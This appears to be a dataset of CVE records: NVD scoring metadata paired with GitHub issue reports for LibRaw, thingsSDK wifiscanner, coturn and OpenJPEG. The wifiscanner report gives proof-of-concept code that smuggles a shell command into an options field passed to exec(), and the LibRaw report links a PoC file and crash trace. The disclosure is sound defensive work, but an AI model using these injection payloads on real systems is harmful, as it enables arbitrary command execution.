{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/compare/0.20-Beta2...0.20-Beta3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/301" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/compare/0.20-Beta2...0.20-Beta3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/301" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:0.20:beta3:*:*:*:*:*:*", "matchCriteriaId": "91AB2B37-1EF7-4A77-86B8-122D7719D234", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/LibRaw/LibRaw/issues/301
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
**Description** An out-of-bounds write vulnerability exists within the "LibRaw::parse_exif()" function (libraw\src\metadata\exif_gps.cpp) which can be triggered by changing the AtomName from "CMT1" to an unknown name and making the "tiff_nifds" field equals zero. **Steps to Reproduce** (poc archive password= girlelecta). https://drive.google.com/file/d/1ExYAqarMtdA_cpcvn2JFvYFP6QKKC5SN/view?usp=sharing cmd: magick.exe convert poc.cr3 new.png Upon running this, following crash happens only in ImageMagick x64 (Note: I enabled page heap on magick.exe): Microsoft (R) Windows Debugger Version 10.0.19041.1 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\magick.exe convert e:\poc.cr3 e:\new.png ************* Path validation summary ************** Response Time (ms) Location Deferred srv* Symbol search path is: srv* Executable search path is: ModLoad: 00007ff7`92190000 00007ff7`921a2000 magick.exe ModLoad: 00007ffc`ef540000 00007ffc`ef730000 ntdll.dll ModLoad: 00007ffc`d4d50000 00007ffc`d4dc1000 C:\WINDOWS\System32\verifier.dll Page heap: pid 0x1824: page heap enabled with flags 0x3. ModLoad: 00007ffc`ee860000 00007ffc`ee912000 C:\WINDOWS\System32\KERNEL32.DLL ModLoad: 00007ffc`ec6a0000 00007ffc`ec944000 C:\WINDOWS\System32\KERNELBASE.dll ModLoad: 00007ffc`ea2a0000 00007ffc`ea32f000 C:\WINDOWS\SYSTEM32\apphelp.dll ModLoad: 00007ffc`d4d20000 00007ffc`d4d42000 C:\WINDOWS\SYSTEM32\VCRUNTIME140D.dll ModLoad: 00007ffc`cb0f0000 00007ffc`cb2ab000 C:\WINDOWS\SYSTEM32\ucrtbased.dll ModLoad: 00007ffc`c3650000 00007ffc`c3942000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_MagickCore_.dll ModLoad: 00007ffc`cae20000 00007ffc`cafeb000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_MagickWand_.dll ModLoad: 00007ffc`ee6c0000 00007ffc`ee854000 C:\WINDOWS\System32\USER32.dll ModLoad: 00007ffc`ed510000 00007ffc`ed531000 C:\WINDOWS\System32\win32u.dll ModLoad: 00007ffc`eebf0000 00007ffc`eec16000 C:\WINDOWS\System32\GDI32.dll ModLoad: 00007ffc`ec500000 00007ffc`ec694000 C:\WINDOWS\System32\gdi32full.dll ModLoad: 00007ffc`ecaa0000 00007ffc`ecb3e000 C:\WINDOWS\System32\msvcp_win.dll ModLoad: 00007ffc`ed330000 00007ffc`ed42a000 C:\WINDOWS\System32\ucrtbase.dll ModLoad: 00007ffc`edce0000 00007ffc`edd83000 C:\WINDOWS\System32\ADVAPI32.dll ModLoad: 00007ffc`eeda0000 00007ffc`eee3e000 C:\WINDOWS\System32\msvcrt.dll ModLoad: 00007ffc`ef380000 00007ffc`ef417000 C:\WINDOWS\System32\sechost.dll ModLoad: 00007ffc`ee450000 00007ffc`ee570000 C:\WINDOWS\System32\RPCRT4.dll ModLoad: 00007ffc`ee580000 00007ffc`ee5ef000 C:\WINDOWS\System32\WS2_32.dll ModLoad: 00007ffc`d4cf0000 00007ffc`d4d17000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_bzlib_.dll ModLoad: 00007ffc`cd6d0000 00007ffc`cd756000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_lcms_.dll ModLoad: 00007ffc`ca8d0000 00007ffc`ca9ef000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_freetype_.dll ModLoad: 00007ffc`cd600000 00007ffc`cd6a0000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_libxml_.dll ModLoad: 00007ffc`d2ed0000 00007ffc`d2f05000 C:\WINDOWS\SYSTEM32\VCOMP140D.DLL ModLoad: 00007ffc`d4cc0000 00007ffc`d4ce3000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_lqr_.dll ModLoad: 00007ffc`d2790000 00007ffc`d27ba000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_zlib_.dll ModLoad: 000001a2`eece0000 000001a2`eed0a000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_zlib_.dll ModLoad: 00007ffc`c1460000 00007ffc`c179b000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_glib_.dll ModLoad: 00007ffc`ed5f0000 00007ffc`edcd4000 C:\WINDOWS\System32\SHELL32.dll ModLoad: 00007ffc`ed2e0000 00007ffc`ed32a000 C:\WINDOWS\System32\cfgmgr32.dll ModLoad: 00007ffc`eec20000 00007ffc`eecc9000 C:\WINDOWS\System32\shcore.dll ModLoad: 00007ffc`eded0000 00007ffc`ee206000 C:\WINDOWS\System32\combase.dll ModLoad: 00007ffc`ed430000 00007ffc`ed4b0000 C:\WINDOWS\System32\bcryptPrimitives.dll ModLoad: 00007ffc`ecb40000 00007ffc`ed2be000 C:\WINDOWS\System32\windows.storage.dll ModLoad: 00007ffc`ec450000 00007ffc`ec473000 C:\WINDOWS\System32\profapi.dll ModLoad: 00007ffc`ec480000 00007ffc`ec4ca000 C:\WINDOWS\System32\powrprof.dll ModLoad: 00007ffc`ec400000 00007ffc`ec410000 C:\WINDOWS\System32\UMPDC.dll ModLoad: 00007ffc`ee3f0000 00007ffc`ee442000 C:\WINDOWS\System32\shlwapi.dll ModLoad: 00007ffc`ec410000 00007ffc`ec421000 C:\WINDOWS\System32\kernel.appcore.dll ModLoad: 00007ffc`ed2c0000 00007ffc`ed2d7000 C:\WINDOWS\System32\cryptsp.dll ModLoad: 00007ffc`ee210000 00007ffc`ee367000 C:\WINDOWS\System32\ole32.dll ModLoad: 00007ffc`eb920000 00007ffc`eb95a000 C:\WINDOWS\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffc`eb960000 00007ffc`eba2b000 C:\WINDOWS\SYSTEM32\DNSAPI.dll ModLoad: 00007ffc`eed80000 00007ffc`eed88000 C:\WINDOWS\System32\NSI.dll (1824.1fc8): Break instruction exception - code 80000003 (first chance) ntdll!LdrpDoDebuggerBreak+0x30: 00007ffc ef61119c cc int 3 0:000> g ModLoad: 00007ffc`eed50000 00007ffc`eed7e000 C:\WINDOWS\System32\IMM32.DLL ModLoad: 00007ffc`e32a0000 00007ffc`e32af000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\IM_MOD_DB_DNG_.dll ModLoad: 00007ffc`c12b0000 00007ffc`c145c000 C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_libraw_.dll ModLoad: 00007ffc`ca700000 00007ffc`ca7f6000 C:\WINDOWS\SYSTEM32\MSVCP140D.dll (1824.1fc8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_libraw_.dll CORE_DB_libraw_!LibRaw::parse_exif+0xc21: 00007ffc`c130f541 f30f1184012c960600 movss dword ptr [rcx+rax+6962Ch],xmm0 ds:00008412`f3b2d48c=???????? 0:000> k Child-SP RetAddr Call Site 00 0000003f`a10ef060 00007ffc`c12f44ee CORE_DB_libraw_!LibRaw::parse_exif+0xc21 [c:\imagemagick-7.0.10-19-x64\libraw\src\metadata\exif_gps.cpp @ 121] 01 0000003f`a10ef660 00007ffc`c12f533d CORE_DB_libraw_!LibRaw::parseCR3+0x8fe [c:\imagemagick-7.0.10-19-x64\libraw\src\metadata\cr3_parser.cpp @ 334] 02 0000003f`a10ef930 00007ffc`c12f533d CORE_DB_libraw_!LibRaw::parseCR3+0x174d [c:\imagemagick-7.0.10-19-x64\libraw\src\metadata\cr3_parser.cpp @ 518] 03 0000003f`a10efc00 00007ffc`c12d0bf5 CORE_DB_libraw_!LibRaw::parseCR3+0x174d [c:\imagemagick-7.0.10-19-x64\libraw\src\metadata\cr3_parser.cpp @ 518] 04 0000003f`a10efed0 00007ffc`c13a79de CORE_DB_libraw_!LibRaw::identify+0x2085 [c:\imagemagick-7.0.10-19-x64\libraw\src\metadata\identify.cpp @ 719] 05 0000003f`a10f33f0 00007ffc`c13ab149 CORE_DB_libraw_!LibRaw::open_datastream+0x10e [c:\imagemagick-7.0.10-19-x64\libraw\src\utils\open.cpp @ 377] 06 0000003f`a10f3690 00007ffc`c13bdfc8 CORE_DB_libraw_!LibRaw::open_file+0x269 [c:\imagemagick-7.0.10-19-x64\libraw\src\utils\open.cpp @ 99] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\IM_MOD_DB_DNG_.dll 07 0000003f`a10f37c0 00007ffc`e32a1983 CORE_DB_libraw_!libraw_open_wfile+0x58 [c:\imagemagick-7.0.10-19-x64\libraw\src\libraw_c_api.cpp @ 113] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_MagickCore_.dll 08 0000003f`a10f3800 00007ffc`c36c6c97 IM_MOD_DB_DNG_!ReadDNGImage+0x2d3 [c:\imagemagick-7.0.10-19-x64\imagemagick\coders\dng.c @ 413] 09 0000003f`a10f5910 00007ffc`c36c84a3 CORE_DB_MagickCore_!ReadImage+0x5e7 [c:\imagemagick-7.0.10-19-x64\imagemagick\magickcore\constitute.c @ 553] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.10-19-x64\VisualMagick\bin\CORE_DB_MagickWand_.dll 0a 0000003f`a10fab30 00007ffc`cae5aac3 CORE_DB_MagickCore_!ReadImages+0x393 [c:\imagemagick-7.0.10-19-x64\imagemagick\magickcore\constitute.c @ 943] 0b 0000003f`a10fbbe0 00007ffc`caef44ae CORE_DB_MagickWand_!ConvertImageCommand+0x1523 [c:\imagemagick-7.0.10-19-x64\imagemagick\magickwand\convert.c @ 606] *** WARNING: Unable to verify checksum for magick.exe 0c 0000003f`a10fd730 00007ff7`921914ea CORE_DB_MagickWand_!MagickCommandGenesis+0x33e [c:\imagemagick-7.0.10-19-x64\imagemagick\magickwand\mogrify.c @ 191] 0d 0000003f`a10fe8a0 00007ff7`92191693 magick!MagickMain+0x4ea [c:\imagemagick-7.0.10-19-x64\imagemagick\utilities\magick.c @ 149] 0e 0000003f`a10ffb10 00007ff7`92191f24 magick!wmain+0x43 [c:\imagemagick-7.0.10-19-x64\imagemagick\utilities\magick.c @ 195] 0f 0000003f`a10ffb50 00007ff7`92191e37 magick!invoke_main+0x34 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 80] 10 0000003f`a10ffb90 00007ff7`92191cfe magick!__scrt_common_main_seh+0x127 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 253] 11 0000003f`a10ffbf0 00007ff7`92191f39 magick!__scrt_common_main+0xe [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 296] 12 0000003f`a10ffc20 00007ffc`ee877bd4 magick!wmainCRTStartup+0x9 [f:\dd\vctools\crt\vcstartup\src\startup\exe_wmain.cpp @ 17] 13 0000003f`a10ffc50 00007ffc`ef5ace51 KERNEL32!BaseThreadInitThunk+0x14 14 0000003f`a10ffc80 00000000`00000000 ntdll!RtlUserThreadStart+0x21 0:000> u CORE_DB_libraw_!LibRaw::parse_exif+0xc21 [c:\imagemagick-7.0.10-19-x64\libraw\src\metadata\exif_gps.cpp @ 121]: 00007ffc`c130f541 f30f1184012c960600 movss dword ptr [rcx+rax+6962Ch],xmm0 00007ffc`c130f54a e9080b0000 jmp CORE_DB_libraw_!LibRaw::parse_exif+0x1737 (00007ffc`c1310057) 00007ffc`c130f54f 8b542474 mov edx,dword ptr [rsp+74h] 00007ffc`c130f553 488b8c2400060000 mov rcx,qword ptr [rsp+600h] 00007ffc`c130f55b e850ddfbff call CORE_DB_libraw_!LibRaw::getreal (00007ffc`c12cd2b0) 00007ffc`c130f560 f20f5ac0 cvtsd2ss xmm0,xmm0 00007ffc`c130f564 488b842400060000 mov rax,qword ptr [rsp+600h] 00007ffc`c130f56c f30f118018ef0200 movss dword ptr [rax+2EF18h],xmm0 **System Configuration** - ImageMagick: Version: ImageMagick-7.0.10-19-Q16 https://imagemagick.org License: https://imagemagick.org/script/license.php - Environment (Operating system, version and so on): Distributor ID: Microsoft Windows Description: Windows 10
"LibRaw::parse_exif()" Out-of-bounds write vulnerability
https://api.github.com/repos/LibRaw/LibRaw/issues/301/comments
1
2020-06-15T14:19:19Z
2020-06-16T10:21:32Z
https://github.com/LibRaw/LibRaw/issues/301
638,892,456
301
1,325
CVE-2020-15362
2020-06-29T17:15:11.430
wifiscanner.js in thingsSDK WiFi Scanner 1.0.1 allows Code Injection because it can be used with options to overwrite the default executable/binary path and its arguments. An attacker can abuse this functionality to execute arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/thingsSDK/wifiscanner/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/thingsSDK/wifiscanner/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thingssdk:wifiscanner:1.0.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "5740B6F4-9D59-420E-AEDA-842560F2B9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/thingsSDK/wifiscanner/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "thingsSDK", "wifiscanner" ]
This module can be used with options that can be used to overwrite default executable/binary path and arguments to the said executable/binary. An attacker can abuse this functionality to have the module execute a binary of their choice. The following code snippets in the wifiscanner.js is responsible for the issue. ``` scan(callback, standardErrorCallback) { childProcess.exec(this.command, (error, standardOut, standardError) => { if (standardError && typeof standardErrorCallback === "function") { standardErrorCallback(standardError); } callback(error, this.parse(standardOut.toString())); }); } get command() { return this.options.binaryPath + " " + this.options.args; } ``` As we can see, _**this.command**_ is not sanitized in anyway prior to being passed to the **_exec()_**. Hence, the following payloads can be used to execute arbitrary commands: **Exploit 1:** ``` let wifiscanner = require("wifiscanner"); let options = { args: ";/bin/touch /tmp/exploit.txt;#" } let scanner = wifiscanner(options); scanner.scan(function(error, networks){}); ``` **Exploit 2:** ``` let wifiscanner = require("wifiscanner"); let options = { args: "/tmp/exploit.txt", binaryPath: "/bin/touch" } let scanner = wifiscanner(options); scanner.scan(function(error, networks){}); ``` User input must be appropriately sanitized prior to being passed to the module. At the very least users must be advised to manually sanitize user inputs when using this module.
Remote Code Execution Bug due to Improper Input Sanitization
https://api.github.com/repos/thingsSDK/wifiscanner/issues/1/comments
0
2020-06-11T03:20:43Z
2020-06-11T03:20:43Z
https://github.com/thingsSDK/wifiscanner/issues/1
636,686,417
1
1,326
CVE-2020-4067
2020-06-29T20:15:10.413
In coturn before version 4.5.1.3, there is an issue whereby STUN/TURN response buffer is not initialized properly. There is a leak of information between different client connections. One client (an attacker) could use their connection to intelligently query coturn to get interesting bytes in the padding bytes from the connection of another client. This has been fixed in 4.5.1.3.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 4.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00010.html" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes" ], "url": "https://github.com/coturn/coturn/blob/aab60340b201d55c007bcdc853230f47aa2dfdf1/ChangeLog#L15" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/coturn/coturn/issues/583" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/coturn/coturn/security/advisories/GHSA-c8r8-8vp5-6gcm" }, { "source": "security-advisories@github.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00002.html" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5G35UBNSRLL6SYRTODYTMBJ65TLQILUM/" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TNJJO77ZLGGFJWNUGP6VDG5HPAC5UDBK/" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4415-1/" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4711" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00010.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/coturn/coturn/blob/aab60340b201d55c007bcdc853230f47aa2dfdf1/ChangeLog#L15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/coturn/coturn/issues/583" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/coturn/coturn/security/advisories/GHSA-c8r8-8vp5-6gcm" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00002.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5G35UBNSRLL6SYRTODYTMBJ65TLQILUM/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TNJJO77ZLGGFJWNUGP6VDG5HPAC5UDBK/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4415-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4711" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:coturn_project:coturn:*:*:*:*:*:*:*:*", "matchCriteriaId": "C96CC629-0987-4323-8C5D-37D26FFE603B", "versionEndExcluding": "4.5.1.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "matchCriteriaId": "902B8056-9E37-443B-8905-8AA93E2447FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "matchCriteriaId": "B009C22E-30A4-4288-BCF6-C3E81DEAF45A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "665" ]
665
https://github.com/coturn/coturn/issues/583
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "coturn", "coturn" ]
Hi, I would like to report a (potentially exploitable) security issue in coturn, but I am not sure what the expected process is and if you desire to discuss this issue confidentially until it is resolved. Regarding the criticality/impact: I am not completely sure, what the impact is, but I can imagine that this can be practically exploited depending on the exact scenario where coturn is used in. In summary, I'd really like to have this issue resolved. Could you please give me guidance on how to proceed?
Reporting a security issue: CVE-2020-4067
https://api.github.com/repos/coturn/coturn/issues/583/comments
3
2020-06-17T10:12:53Z
2020-06-29T19:31:22Z
https://github.com/coturn/coturn/issues/583
640,318,786
583
1,327
CVE-2020-15389
2020-06-29T21:15:14.150
jp2/opj_decompress.c in OpenJPEG through 2.3.1 has a use-after-free that can be triggered if there is a mix of valid and invalid files in a directory operated on by the decompressor. Triggering a double-free may also be possible. This is related to calling opj_image_destroy twice.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 4.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
